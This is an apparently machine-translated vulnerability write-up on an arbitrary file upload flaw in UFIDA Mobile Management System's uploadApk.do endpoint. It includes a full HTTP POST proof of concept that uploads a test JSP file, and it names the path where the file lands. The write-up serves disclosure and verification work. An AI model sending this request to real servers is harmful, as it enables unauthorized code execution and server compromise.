Ufida Mobile Management System Uploadapk Do Any File Upload Vulnerability
Ufida Mobile Management System Uploadapk Do Any File Upload Vulnerability
UFIDA Mobile Management System uploadApk.do any file upload vulnerability
Vulnerability Description
UFIDA Mobile Management System uploadApk.do interface has a vulnerability to upload any file, and an attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
UFIDA Mobile Management System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
1
/maupload/apk/a.jsp
This post is licensed under CC BY 4.0 by the author.